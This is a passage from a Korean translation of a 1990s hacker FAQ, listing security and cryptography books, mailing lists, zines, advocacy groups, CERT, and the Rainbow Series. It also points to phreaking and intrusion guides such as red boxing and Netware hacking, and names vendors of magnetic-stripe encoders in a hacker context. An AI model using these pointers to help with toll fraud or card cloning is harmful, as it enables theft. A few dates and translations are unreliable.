Publisher: AP Professional

Copyright Date: 1994

ISBN: 0-12-638010-4

N Network Security: How to Plan For It and How to Achieve It

Author: Richard M. Baker

Publisher: McGraw-Hill, Inc.

Copyright Date:

ISBN: 0-07-005141-0

N Network Security

Author: Steven L. Shaffer and Alan R. Simon

Publisher: Academic Press

Copyright Date: 1994

ISBN: 0-12-638010-4

N Network Security: Private Communications in a Public World

Author: Charlie Kaufman, Radia Perlman and Mike Speciner

Publisher: Prentice Hall

Copyright Date: 1995

ISBN: 0-13-061466-1

N Network and Internetwork Security: Principles and Practice

Author: William Stallings

Publisher: Prentice Hall

Copyright Date: 1995

ISBN: 0-02-415483-0

N Implementing Internet Security

Author: William Stallings

Publisher: New Rider Publishing

Copyright Date: 1995

ISBN: 1-56205-471-6

N Actually Useful Internet Security Techniques

Author: Larry J. Hughes, Jr.

Publisher: New Riders Publishing

Copyright Date: 1995

ISBN: 1-56205-508-9

Cryptology

~~~~~~~~~~~~

Applied Cryptography: Protocols, Algorithms, and Source Code in C

Author: Bruce Schneier

Publisher: John Wiley & Sons

Copyright Date: 1994

ISBN: 0-471-59756-2

Bruce Schneier의 책이 다른 모은 암호학에 관한 책을 대체해 버렸다.

암호학에 관심이 있다면 필독서이다.

암호학에 관련해서 사야할 처음이자 마지막 책이다.

Cryptography and Data Security

Author: Dorothy Denning

Publisher: Addison-Wesley Publishing Co.

Copyright Date: 1982

ISBN: 0-201-10150-5

Protect Your Privacy: A Guide for PGP Users

Author: William Stallings

Publisher: Prentice-Hall

Copyright Date: 1994

ISBN: 0-13-185596-4

Codebreakers

Author: Kahn

Publisher: Simon and Schuster

Copyright Date:

ISBN:0-02-560460-0

Codebreakers: The Inside Story of Bletchley Park

Author: Francis Harry Hinsley and Alan Stripp

Publisher: Oxford University Press,

Copyright Date: 1993

ISBN:0-19-285304-X

Cryptanalysis, a study of ciphers and their solution

Author: Gaines, Helen Fouche

Publisher: Dover Publications

Copyright Date: 1956

ISBN:

N Computer Privacy Handbook

Author: Andre' Bacard

Publisher: Peachpit Press

Copyright Date: 1995

ISBN: 1-56609-171-3

N E-Mail Security with PGP and PEM

Author: Bruce Schneier

Publisher: John Wiley & Sons

Copyright Date: 1995

ISBN: 0-471-05318-X

N PGP: Pretty Good Privacy

Author: Simson Garfinkel

Publisher: O'Reilly & Associates, Inc.

Copyright Date: 1995

ISBN: 1-56592-098-8

Programmed Threats

~~~~~~~~~~~~~~~~~~

The Little Black Book of Computer Viruses

Author: Mark Ludwig

Publisher: American Eagle Publications

Copyright Date: 1990

ISBN: 0-929408-02-0

N The Giant Black Book of Computer Viruses

Author: Mark Ludwig

Publisher: American Eagle Publications

Copyright Date: 1995

ISBN:

Computer Viruses, Artificial Life and Evolution

Author: Mark Ludwig

Publisher: American Eagle Publications

Copyright Date: 1993

ISBN: 0-929408-07-1

Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other

Threats to Your System

Author: John McAfee and Colin Haynes

Publisher: St. Martin's Press

Copyright Date: 1989

ISBN: 0-312-03064-9 and 0-312-02889-X

The Virus Creation Labs: A Journey Into the Underground

Author: George Smith

Publisher: American Eagle Publications

Copyright Date: 1994

ISBN: 0-929408-09-8

U A Short Course on Computer Viruses

Author: Dr. Fred Cohen

Publisher: John Wiley & Sons

Copyright Date: 1994

ISBN: 0-471-00769-2

N Robert Slade's Guide to Computer Viruses

Author: Robert Slade

Publisher: Springer-Verlag

Copyright Date: 1994

ISBN: 0-387-94311-0 / 3-540-94311-0

Telephony

~~~~~~~~~

Engineering and Operations in the Bell System

Author: R.F. Rey

Publisher: Bell Telephont Laboratories

Copyright Date: 1983

ISBN: 0-932764-04-5

아주 오래된 책이지만, 이 책은 아직도 telephony에 대한 권위서이다.

이 책은 100% Bell에 관한 것이다. 그리고 전세계 phreaker에게 사랑받는다.

Telephony: Today and Tomorrow

Author: Dimitris N. Chorafas

Publisher: Prentice-Hall

Copyright Date: 1984

ISBN: 0-13-902700-9

The Telecommunications Fact Book and Illustrated Dictionary

Author: Ahmed S. Khan

Publisher: Delmar Publishers, Inc.

Copyright Date: 1992

ISBN: 0-8273-4615-8

이 사전은 telephony에 관해서 뛰어난 것이다.

그리고 이 분야의 깊은 관심이 있는 사람에게 권하고 싶다.

Tandy/Radio Shack Cellular Hardware

Author: Judas Gerard and Damien Thorn

Publisher: Phoenix Rising Communications

Copyright Date: 1994

ISBN:

The Phone Book

Author: Carl Oppendahl

Publisher: Consumer Reports

Copyright Date:

ISBN: 0-89043-364-x

Listing of every cellular ID in the us, plus roaming ports,

and info numbers for each carrier.

Principles of Caller I.D.

Author:

Publisher: International MicroPower Corp.

Copyright Date:

ISBN:

Hacking History and Culture

~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Hacker Crackdown: Law and Disorder on the Electronic Frontier

Author: Bruce Sterling

Publisher: Bantam Books

Copyright Date: 1982

ISBN: 0-553-56370-X

Bruce Sterling이 최근 이 책을 네트워크에 무료로 배포했다.

이 책은 인쇄된 형태로 읽기가 더 쉽고, 퍼이퍼백이 겨우 $5.99이다.

어떻게 읽든 읽었다는 것에 대해 만족할 것이다.

Sterling씨는 뛰어난 공상과학소설 작가이며,

해킹 문화에서 사용하는 단어에 재능을 보였다.

매우 즐거운 독서 경험이다.

Cyberpunk

Author: Katie Hafner and John Markoff

Publisher: Simon and Schuster

Copyright Date: 1991

ISBN: 0-671-77879-X

The Cuckoo's Egg

Author: Cliff Stoll

Publisher: Simon and Schuster

Copyright Date: 1989

ISBN: 0-671-72688-9

Hackers: Heroes of the Computer Revolution

Author: Steven Levy

Publisher: Doubleday

Copyright Date: 1984

ISBN: 0-440-13495-6

Unclassified

~~~~~~~~~~~~

The Hacker's Handbook

Author: Hugo Cornwall

Publisher: E. Arthur Brown Company

Copyright Date:

ISBN: 0-912579-06-4

Secrets of a Super Hacker

Author: The Knightmare

Publisher: Loompanics

Copyright Date: 1994

ISBN: 1-55950-106-5

The Knightmare는 수퍼 해커가 아니다. 이 책에는 크게 도움이 될 내용이 없다.

he Knightmare는 쓰레기 버리러 갈 때는 옷을 차려입을 필요가 없다는 유용한 충고를 하고 있다. The Knightmare의 가장 뛰어난 해킹은 Loompanics에서 이책을 출판하도록 한 것이다.

The Day The Phones Stopped

Author: Leonard Lee

Publisher: Primus / Donald I Fine, Inc.

Copyright Date: 1992

ISBN: 1-55611-286-6

완전 쓰레기이다. 미치광이의 정신발작이다.

Enquirer 잡지의 데이터보다 더 비사실적이다.

Information Warfare

Author: Winn Swartau

Publisher: Thunder Mountain Press

Copyright Date: 1994

ISBN: 1-56025-080-1

전자 정보전의 기술과 장비에 대한 잘 설명된 해설서

Author: Doug Richardson

Publisher: Salamander Press

Copyright Date:

ISBN: 0-668-06497-8



해커에게 관심가는 비디오는 무엇인가?

'Unauthorized Access' by Annaliza Savage

$25 on VH S format in 38-min

Savage Productions

1803 Mission St., #406

Santa Cruz, CA 95060

Hacker's '95 - a Phon-E & R.F. Burns Production

See the video Emmanuel Goldstein thought would have the Feds knocking

at his door. Coverage of Summercon'95 Coverage of Defcon III The big Y

fiasco at Summercon PMF (narc) interviews Emmanuel Goldstein & Eric

BloodAxe. Trip to Area 51 and interview with Psyhospy Coverage of the

Secret Service briefing on Operation Cyber Snare (recent cell busts)

Talks on Crypto, HERF, the Feds, etc. All information is presented

for educational purposes only. Not for sale to government or law

enforcement organizations. Running time aproximately 90 minutes.

$25.00 NTSC VHS

$35.00 PAL/Secam VHS

Custom Video Productions

(908)842-6378

videocvp@ix.netcom.com



해커에게 관심가는 메일링 리스트는 무엇인가?

Academic Firewalls

Registration Address: Send a message to majordomo@greatcircle.com

containing the line "subscribe firewalls user@host"

N The Alert

Registration Address: Send a message to request-alert@iss.net

containing the line "subscribe alert"

Bugtraq

Reflector Address: bugtraq@fc.net

Registration Address: bugtraq-request@fc.net

Cert Tools

Reflector Address: cert-tools@cert.org

Registration Address: cert-tools-request@cert.org

Computers and Society

Reflector Address: Comp-Soc@limbo.intuitive.com

Registration Address: taylor@limbo.intuitive.com

Coordinated Feasibility Effort to Unravel State Data

Reflector Address: ldc-sw@cpsr.org

Registration Address:

CPSR Announcement List

Reflector Address: cpsr-announce@cpsr.org

Registration Address:

CPSR - Intellectual Property

Reflector Address: cpsr-int-prop@cpsr.org

Registration Address:

CPSR - Internet Library

Reflector Address: cpsr-library@cpsr.org

Registration Address:

N Cypherpunks

Registration Address: Send a message to majordomo@toad.com

containing the line "subscribe cypherpunks"

DefCon Announcement List

Registration Address: Send a message to majordomo@fc.net containing

the line "subscribe dc-announce"

DefCon Chat List

Registration Address: Send a message to majordomo@fc.net containing

the line "subscribe dc-stuff"

N Discount Long Distance Digest

Registration Address: Send a message to: dld-request@webcom.com

containing the line "subscribe"

Electronic Payment

Registration Address: e-payment@cc.bellcore.com

IDS (Intruder Detection Systems)

Registration Address: Send a message to majordomo@wyrm.cc.uow.edu.au

containing the line "subscribe ids"

N Information Warfare

Registration Address: E-mail iw@all.net with a request to be added.

N Linux-Alert

Registration Address: majordomo@linux.nrao.edu

N Linux-Security

Registration Address: majordomo@linux.nrao.edu

Macintosh Security

Reflector Address: mac-security@eclectic.com

Registration Address: mac-security-request@eclectic.com

NeXT Managers

Registration Address: next-managers-request@stolaf.edu

PGP3 announcement list

Registration Address: pgp-announce-request@lsd.com

Subject: Your Name <user@host>

Body: *ignored*

Phiber-Scream

Registration Address: Send a message to listserv@netcom.com

containing the line "subscribe phiber-scream user@host"

phruwt-l (Macintosh H/P)

Registration Address: Send a message to filbert@netcom.com

with the subject "phruwt-l"

rfc931-users

Reflector Address: rfc931-users@kramden.acf.nyu.edu

Registration Address: brnstnd@nyu.edu

RSA Users

Reflector Address: rsaref-users@rsa.com

Registration Address: rsaref-users-request@rsa.com

WWW Security

Registration Address: www-security@ns2.rutgers.edu


해커에게 관심가는 출판물은 무엇인가?

2600 - The Hacker Quarterly

~~~~~~~~~~~~~~~~~~~~~~~~~~~

E-mail addresses: info@2600.com - to get info on 2600

index@2600.com - to get a copy of our index

meetings@2600.com - for info on starting your own meeting

subs@2600.com -- for subscription problems

letters@2600.com -- to send us a letter

articles@2600.com -- to send us an article

2600@2600.com -- to send us a general message

Subscription Address: 2600 Subscription Dept

PO Box 752

Middle Island, NY 11953-0752

Letters and article submission address: 2600 Editorial Dept

PO Box 99

Middle Island, NY 11953-0099

Phone Number: (516)751-2600

Fax Number: (516)474-2677

Voice BBS: (516)473-2626

Subscriptions: United States: $21/yr individual, $50 corporate.

Overseas: $30/yr individual, $65 corporate.

Gray Areas

~~~~~~~~~~

Gray Area는 법과 도덕성의 회색 재대를 조사하고 논쟁의 소지가 있거나, 비윤리적 불법적인 주

제를 다룬다. Gray Areas는 왜 해커가 해킹을 하는지 조사하고 일탈적 행위의 사회적 틀로서 해

킹을 규정한다.

E-Mail Address: grayarea@well.sf.ca.us

E-Mail Address: grayarea@netaxs.com

U.S. Mail Address: Gray Areas

PO Box 808

Broomall, PA 19008

Subscriptions: $26.00 4 issues first class

$34.00 4 issues foreign (shipped air mail)

Privacy Newsletter

~~~~~~~~~~~~~~~~~~

Privacy Newsletter 는 월간 뉴스레트로 독자들로 하여금 어떻게 프라이버시를 얻고 유지하는지

에 대해 알려주는 것을 목적으로 한다.

E-Mail Address: privacy@interramp.com

Subscription Address: Privacy Newsletter

P.O. Box 8206

Philadelphia, PA 19101-8206

Subscriptions: $99/yr (US) $149/yr (Overseas)

Wired

~~~~~

Subscription Address: subscriptions@wired.com

or: Wired

PO Box 191826

San Francisco, CA 94119-9866

Letters and article submission address: guidelines@wired.com

or: Wired

544 Second Street

San Francisco, CA 94107-1427

Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)

Nuts & Volts

~~~~~~~~~~~~

T& L Publications

430 Princeland Court

Corona, CA 91719

(800)783-4624 (Voice) (Subscription Only Order Line)

(909)371-8497 (Voice)

(909)371-3052 (Fax)

CIS: 74262,3664

Cybertek: The Cyberpunk Technical Journal

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

P.O. Box 64

Brewster, NY 10509

Frequency: Bimonthly

Domestic Subscription Rate: $15/year (6 issues)

PrivateLine

~~~~~~~~~~~

5150 Fair Oaks Blvd. #101-348

Carmichael, CA 95608 USA

E-Mail: privateline@delphi.com

Subscriptions: $24 a year for six issues

Text of back issues are at the etext archive at Michigan. Gopher over

or ftp to: etext.archive.umich.edu/pub/Zines/PrivateLine


해커에게 관심가는 e-zine(전자잡지)는 무엇인가?

CoTNo: Communications of The New Order ftp.etext.org /pub/Zines/CoTNo

Empire Times ftp.etext.org /pub/Zines/Emptimes

FEH ftp.fc.net /pub/defcon/FEH

The Infinity Concept infonexus.com

/pub/Philes/Zines/TheInfinityConcept

Phrack ftp.fc.net /pub/phrack


해커에게 관심가는 기관은 무엇인가?

Computer Professionals for Social Responsibility (CPSR)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CPSR은 컴퓨터 전문가와 컴퓨터 사용자가 정보 기술을 사용하는 데 대한 책임을 부여하고 컴퓨터를 이용하는 모든 사람이 공공 논쟁에 참여하도록 한다. 기술적인 전문가로서 CPSR 회원은 인민과 정책입안자에게 권력과 공약 그리고 컴퓨터 기술의 제한사항 등에 대한 실제적인 평가를 제공한다. 의식있는 시민의 기관으로서 CPSR은 공공의 관심을 컴퓨터의 응용에 대한 비판적인 선택과 그 선택이 사회에 미치는 영향으로 돌린다. 문제가 없는 기술적 정보와 정책 개발 노하우를 비교하여 CPSR은 최소한의 비용으로 최대의 효과와 기술 정책의 형성에 대해 광범위한 공공의 참여를 촉진한다. 수행하는 프로젝트는 다음과 같은 5 가지 원칙에 기인한다.

* 기술만으로 정치적 사회적 문제를 해결할 수 있다는 가정에 도전한다.

* 비판적으로 컴퓨터에서의 사회와 기술 문제를 검토한다.

* 삶의 질을 높이는 데 컴퓨터 기술의 이용을 권장한다.

CPSR Membership Categories

75 REGULAR MEMBER

50 Basic member

200 Supporting member

500 Sponsoring member

1000 Lifetime member

20 Student/low income member

50 Foreign subscriber

50 Library/institutional subscriber

CPSR National Office

P.O. Box 717

Palo Alto, CA 94301

415-322-3778

415-322-3798 (FAX)

E-mail: cpsr@csli.stanford.edu

Electronic Frontier Foundation (EFF)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Electronic Frontier Foundation (EFF)은 컴퓨터 기반 통신의 자유와 공개성의 발전시킬 수

있는 정책이나 활동을 추구한다. 회원에 의해 운영되고, 비영리 단체로서 정보화 시대에서 새새로운 공공 이익 집단이 필요하다는 신념에서 나왔다. 이는 이 기관(집단)이 새로운 컴퓨터 통신 기술의 민주적인 잠재력을 보호하고 확장하는 것에 목적이 있다는 것이다. 시작부터, EFF는 기술적, 법률적 공공 정책의 전문성을 결합하는 기관이며 그리고 이러한 기술을 새로운 통신 매체가 탄생할 때마다 발생하는 다양한 문제와 관심에 적용한다. 회원비는 학생은 $20.00/년 이며 정규 회원의 경우 $40.00/년 이고 기관 회원은 $100.00/년이다.

The Electronic Frontier Foundation, Inc.

1001 G Street, NW

Suite 950 East

Washington, D.C. 20001

(202)544 9237

(202)547 5481 FAX

Internet: eff@eff.org

Free Software Foundation (FSF) and GNU

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Free Software Foundation 은 사람들이 컴퓨터 프로그램을 이용, 복사, 변경, 재배포하는 권리에 대한 제한을 제거하는 데 목적을 둔다. 컴퓨터를 이용하는 모든 분야에서 무료 소프트웨어의 사용과 개발을 돕는다. 특히, "GNU" ("GNU's Not Unix", "그누"라고 발음)라는 Unix와 위로 호환성을 가지는 자체로 완벽하고 통합된 소프트웨어를 만든다. 이 시스템의 대부분은 이미 사용되고 배포되고 있다. "무료"라는 단어는 자유를 의미하지 가격이 공짜라는 것은 아니다. GNU 소프트웨어를 얻기 위해서 돈을 지불하거나 지불하지 않을 수 있다. 그러나, 일단 그것을 입수하면 두가지 특정 자유를 가지게 된다. 첫째, 프로그램을 복사해서 친구나 동료에게 줄 수 있다. 둘째, 소스 코드에 완전히 접근이 가능하므로 소프트웨어를 원하는대로 변경할 수 있다. 소스를 연구하고 어떻게 그러한 소프트웨어를 작성하는지에 대해서 배울 수 있다. 프로그램을 포트하고 향상하고 변경된 것을 다른 사람과 공유할 수 있다. GNU 소프트웨어를 재배포할 때, 배포에 대한 비용을 물리거나 아니면 공짜로 줄 수 있다. 이 때 GPL(GNU General Public License)와 소스 코드를 포함해야 한다.

Free Software Foundation, Inc. Telephone: +1-617-876-3296

673 Massachusetts Avenue Fax: +1-617-492-9057

Cambridge, MA 02139-3309 USA Fax (in Japan): 0031-13-2473 (KDD)

Electronic mail: gnu@prep.ai.mit.edu 0066-3382-0158 (IDC)

GNU는 사용자가 컴퓨터를 이용하는 데 완벽한 통합 컴퓨팅 환경을 갖추려한다. 사무실이나 가정에서 사용하는 프로그래머이던 아니면 일반 사용자이든간에. 핵심은 운영체제로 컴퓨터에서 다른 프로그램이 수행할 수 있도록 하는 커널이라고 불리우는 중앙 프로그램으로 구성되어 있다. 그리고 파일을 처리할 수 있는 부차적인 많은 수의 프로그램들이 있다. Free Software Foundation은 Hurd라고 불리는 진보된 커널을 개발하고 있다. 완벽한 체계는 컴파일러와 디버거와 같은 프로그래머를 위한 도구를 가진다. 또한 펀집기, 스케치패드, 칼랜더, 계산기, 스프래드쉬트, 데이터베이서, 전자 우편 리더와 인터넷 네비게이트 등도 포함한다. FSF는 이미 운영체제에서 사용되는 대부분의 프로그램, 프로그래머들이 자주 사용하는 모든 도구와 그 이상을 제공하고 있다.

The League for Programming Freedom (LPF)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

League for Programming Freedom은 "look and feel" 저작권 재판을 통해 공통 유저 인터페이스을 독점하려는 시도에 대해 반대하는 사람들의 기관이다. 이들 중 일부는 프로그래머로 자신의 작업을 방해할지도 모르는 독점에 대해 걱정하고 있다. 또 다른 일부는 자신들이 알고 있는 인터페이스와 호환이 되는 새로운 컴퓨터 시스템을 원한다. 어떤 이는 Richard P. Gabriel와 같은 컴퓨터 하드웨어나 소프트웨어 회사의 창시자나 John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S. Boyer 와 Patrick Winston같은 교수나 연구자들이다. "Look and feel" 재판은 새로운 형태의 관주도의 독점을 이전 어느 것보다 광범위하게 만들어 낸다. 이러한 형태의 사용자 인터페이스 체계 저작권은

lawsuits aim to create a new class of government-

enforced monopolies broader in scope than ever before. Such a system

of user-interface copyright would impose gratuitous incompatibility,

reduce competition, and stifle innovation.

이러한 문제를 사용자 인터페이스 저작권을 막음으로서 해결하려 한다. 1986년 까지의 저작권법에 의한 저작권에 대해서 반대하지는 않는다. -- 특정 프로그램에 대한 저작권. 목표는 기존의 프로그램과 관행에 따른 프로그램과 호환되는 새로운 프로그램을 작성할 수 있는 프로그래머들의 전통적인 자유를 박탈하는 저작권 체계의 변화를 막으려는 것이다. 직업이 있는 전문가의 경우 $42의 개인 연회원비가 있으며 다른 사람들은 $21이다. 운동자에 대해 감사한다. 그리고 시간을 투자할 수 없는 회원도 환영한다. 연락은 전화 (617) 243-4091, 또는 인터넷 전자우편 league@prep.ai.mit.edu, 또는 다음 주소로 편지를 쓰기 바란다.

League for Programming Freedom

1 Kendall Square #143

P.O. Box 9171

Cambridge, MA 02139 USA

SotMesc

~~~~~~~

1989에 창설된 SotMesc는 컴퓨터 사회의 통합과 결속을 유지하는 데 목적을 둔다. 컴퓨터 교육, 자유 그리고 효율성을 축진하여 모든 컴퓨터 사용자에게 프라이버시를 유지하면서 자유를 보장할 수 있다고 믿는다. SotMesc는 CSP 인터넷 메일링 리스트를 운영하고 the SotMesc Scholarship Fund, and the SotMesc Newsletter를 운영하고 있다. SotMesc는 일부 회원비로 재정을 충당하고 기부금으로 재원을 충당하지만 대부분은 해킹, 크래킹, 프리킹, 전자공학, 인터넷과 바이러스 정보 그리고 디스크내의 프로그램과 많은 인쇄 매체를 판매함으로서 충당한다. SotMesc 회원비는 학생은 $20이고 정규 회원은 $40이다.

SotMESC

P.O. Box 573

Long Beach, MS 39560

Computer Emergency Response Team (CERT)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CERT 는 Computer Emergency Response Team 으로 Defense Advanced Research Projects

Agency (DARPA)에 의해 1988년 12월 인터넷 웜사건을 계기로 그 필요성이 대두되어 설립되었다. CERT 임무는 인터넷 공동체와 함께 일하여 인터넷 호스트완 연관된 컴퓨터 보안 사건에 대응하는 능력을 기르는 것이며 컴퓨터 사회가 컴퓨터 보안 문제를 인식하는 데 주독적인 노력을 기울이고, 현존하는 시스템의 보안을 향상하는 데 목적을 둔 연구를 수행하는 것에 있다. CERT 제품과 서비스에는 24시간 기술 지원이 있어 컴퓨터 보안 사간에 대응하고 제품 취약성 지원, 기술적 문서, 그리고 세미나 등을 포함한다. 또한, 팀에서는 많은 메일링 리스트(CERT advisory 포함)를 운영하고 anonymous FTP 서버 - cert.org(192.88.209.5)를 운영하여 보안 관련 문서, 이전의 CERT advisory문서와 도구들을 제공하고 있다.

CERT 연락 정보

U.S. mail address

CERT Coordination Center

Software Engineering Institute

Carnegie Mellon University

Pittsburgh, PA 15213-3890

U.S.A.

Internet E-mail address

cert@cert.org

Telephone number

(412)268-7090 (24-hour hotline)

CERT Coordination Center personnel answer

7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for

emergencies during other hours.

FAX number

(412)268-6989


해커에게 관심가는 라디오 프로그램은 무엇인가?

Off The Hook New York 99.5 FM Tue 8pm EST

Full Disclosure Live Short Wave WWCR 5065 khz Sun 8pm EST

Full Disclosure Live Oil City, PA WOYL AM-1340 Sun 8pm EST

Full Disclosure Live Satellite Telstar 302 (T2), Ch 21, 5.8 Sun 8pm EST




해커에게 관심가는 FAQ(frequentlry asked question)는무엇인가?

Frequently Asked Questions "Hacking Novell Netware"

Author: Simple Nomad <sn@spyder.org>

ftp: jumper.mcc.ac.uk /pub/security/netware/faq.zip

ftp: ftp.fastlane.net /pub/nomad/nw/faq.zip

ftp: ftp.best.com /pub/almcepud/hacks/faq.zip

http://resudox.net/bio/mainpage.html

http://www.hookup.net/~apayne/nwhack.html

The PGP Attack FAQ

Author: Route [daemon9@netcom.com / route@infonexus.com]

ftp: infonexus.com /pub/Philes/Cryptography/PGPattackFAQ.txt.gz

Mac Hack FAQ: Defeating Security

Author: AX1P (an149689@anon.penet.fi)

Frequently Asked Questions About Red Boxing

Author: Mr. Sandman (an132432@anon.penet.fi)

VMS FAQ (Frequently Ask Questions)

Author: The Beaver (beaver@upperdck.blkbox.com)

Anonymous FTP FAQ

Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.

ftp: ftp.iss.net /pub/faq/anonftp

Compromise FAQ: What if your Machines are Compromised by an Intruder

Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.

ftp: ftp.iss.net /pub/faq/compromise

Security Patches FAQ

Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.

ftp: ftp.iss.net /pub/faq/patch

Sniffer FAQ

Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.

ftp: ftp.iss.net /pub/faq/sniff

Vendor Security Contacts: Reporting Vulnerabilities and Obtaining New Patches

Author: Christopher Klaus <cklaus@iss.net> of Internet Security Systems, Inc.

ftp: ftp.iss.net /pub/faq/vendor

Cryptography FAQ

Author: The Crypt Cabal

ftp: rtfm.mit.edu /pub/usenet-by-group/sci.crypt/

Firewalls FAQ

Author: Marcus J. Ranum (mjr@ss1.lightspeed.net)

ftp: rtfm.mit.edu /pub/usenet-by-group/comp.security.misc/

Buying a Used Scanner Radio

Author: parnass@att.com (Bob Parnass, AJ9S)

ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/

How to Find Scanner Frequencies

Author: parnass@att.com (Bob Parnass, AJ9S)

ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/

Introduction to Scanning

Author: parnass@att.com (Bob Parnass, AJ9S)

ftp: rtfm.mit.edu /pub/usenet-by-group/rec.radio.scanner/

Low Power Broadcasting FAQ

Author: Rick Harrison.

ftp: rtfm.mit.edu /pub/usenet-by-group/alt.radio.pirate/

RSA Cryptography Today FAQ

Author: Paul Fahn

ftp: rtfm.mit.edu /pub/usenet-by-group/sci.crypt/

VIRUS-L comp.virus Frequently Asked Questions (FAQ)

Author: Kenneth R. van Wyk <krvw@cert.org>

ftp: rtfm.mit.edu /pub/usenet-by-group/comp.virus/

Where to get the latest PGP (Pretty Good Privacy) FAQ

Author: mpj@csn.net (Michael Johnson)

ftp: rtfm.mit.edu /pub/usenet-by-group/alt.security.pgp/

alt.locksmithing answers to Frequently Asked Questions (FAQ)

Author: spike@indra.com (Joe Ilacqua)

ftp: rtfm.mit.edu /pub/usenet-by-group/alt.locksmithing/

comp.os.netware.security FAQ

Author: Fauzan Mirza <F.U.Mirza@sheffield.ac.uk>

ftp: rtfm.mit.edu /pub/usenet-by-group/comp.os.netware.security/

rec.pyrotechnics FAQ

Author: zoz@cs.adelaide.edu.au (Hans Josef Wagemueller)

ftp: rtfm.mit.edu /pub/usenet-by-group/rec.pyrotechnics/



자기띠(magnetic stripe)의 인코더(encoder)와 디코더(decoder)는 어디서 구입하나?

CPU Advance

PO Box 2434

Harwood Station

Littleton, MA 01460

(508)624-4819 (Fax)

Omron Electronics, Inc.

One East Commerce Drive

Schaumburg, IL 60173

(800)556-6766 (Voice)

(708)843-7787 (Fax)

Security Photo Corporation

1051 Commonwealth Avenue

Boston, MA 02215

(800)533-1162 (Voice)

(617)783-3200 (Voice)

(617)783-1966 (Voice)

Timeline Inc,

23605 Telo Avenue

Torrence, CA 90505

(800)872-8878 (Voice)

(800)223-9977 (Voice)

Alltronics

2300 Zanker Road

San Jose CA 95131

(408) 943-9774 Voice

(408) 943-9776 Fax

(408) 943-0622 BBS

Part Number: 92U067

Atalla Corp

San Jose, CA

(408) 435-8850




무지개색 책은 무엇이며 어디서 구할 수 있나?

Orange Book

DoD 5200.28-STD

Department of Defense Trusted Computer System Evaluation Criteria

Green Book

CSC-STD-002-85

Department of Defense Password Management Guideline

Yellow Book

CSC-STD-003-85

Computer Security Requirements -- Guidance for Applying the Department

of Defense Trusted Computer System Evaluation Criteria in Specific

Environments

Yellow Book

CSC-STD-004-85

Technical Rationale Behind CSC-STD-003-85: Computer Security

Requirements. Guidance for Applying the Department of Defense Trusted

Computer System Evaluation Criteria in Specific Environments.

Tan Book

NCSC-TG-001

A Guide to Understanding Audit in Trusted Systems

Bright Blue Book

NCSC-TG-002

Trusted Product Evaluation - A Guide for Vendors

Neon Orange Book

NCSC-TG-003

A Guide to Understanding Discretionary Access Control in Trusted

Systems

Teal Green Book

NCSC-TG-004

Glossary of Computer Security Terms

Red Book

NCSC-TG-005

Trusted Network Interpretation of the Trusted Computer System

Evaluation Criteria

Orange Book

NCSC-TG-006

A Guide to Understanding Configuration Management in Trusted Systems

Burgundy Book

NCSC-TG-007

A Guide to Understanding Design Documentation in Trusted Systems

Dark Lavender Book

NCSC-TG-008

A Guide to Understanding Trusted Distribution in Trusted Systems

Venice Blue Book

NCSC-TG-009

Computer Security Subsystem Interpretation of the Trusted Computer

System Evaluation Criteria

Aqua Book

NCSC-TG-010

A Guide to Understanding Security Modeling in Trusted Systems

Dark Red Book

NCSC-TG-011

Trusted Network Interpretation Environments Guideline -- Guidance for

Applying the Trusted Network Interpretation

Pink Book

NCSC-TG-013

Rating Maintenance Phase -- Program Document

Purple Book

NCSC-TG-014

Guidelines for Formal Verification Systems

Brown Book

NCSC-TG-015

A Guide to Understanding Trusted Facility Management

Yellow-Green Book

NCSC-TG-016

Guidelines for Writing Trusted Facility Manuals

Light Blue

NCSC-TG-017

A Guide to Understanding Identification and Authentication in Trusted

Systems

Light Blue Book

NCSC-TG-018

A Guide to Understanding Object Reuse in Trusted Systems

Blue Book

NCSC-TG-019

Trusted Product Evaluation Questionnaire

Gray Book

NCSC-TG-020A

Trusted Unix Working Group (TRUSIX) Rationale for Selecting

Access Control List Features for the Unix System

Lavender Book

NCSC-TG-021

Trusted Data Base Management System Interpretation of the Trusted

Computer System Evaluation Criteria

Yellow Book

NCSC-TG-022

A Guide to Understanding Trusted Recovery in Trusted Systems

Bright Orange Book

NCSC-TG-023

A Guide to Understandng Security Testing and Test Documentation in

Trusted Systems

Purple Book

NCSC-TG-024 (Volume 1/4)

A Guide to Procurement of Trusted Systems: An Introduction to

Procurement Initiators on Computer Security Requirements

Purple Book

NCSC-TG-024 (Volume 2/4)

A Guide to Procurement of Trusted Systems: Language for RFP

Specifications and Statements of Work - An Aid to Procurement

Initiators

Purple Book

NCSC-TG-024 (Volume 3/4)

A Guide to Procurement of Trusted Systems: Computer Security Contract

Data Requirements List and Data Item Description Tutorial

+Purple Book

+NCSC-TG-024 (Volume 4/4)

+A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's

+Proposal Document - An Aid to Procurement Initiators and Contractors

Green Book

NCSC-TG-025

A Guide to Understanding Data Remanence in Automated Information

Systems

Hot Peach Book

NCSC-TG-026

A Guide to Writing the Security Features User's Guide for Trusted Systems

Turquiose Book

NCSC-TG-027

A Guide to Understanding Information System Security Officer

Responsibilities for Automated Information Systems

Violet Book

NCSC-TG-028

Assessing Controlled Access Protection

Blue Book

NCSC-TG-029

Introduction to Certification and Accreditation

Light Pink Book

NCSC-TG-030

A Guide to Understanding Covert Channel Analysis of Trusted Systems

C1 Technical Report-001

Computer Viruses: Prevention, Detection, and Treatment

*C Technical Report 79-91

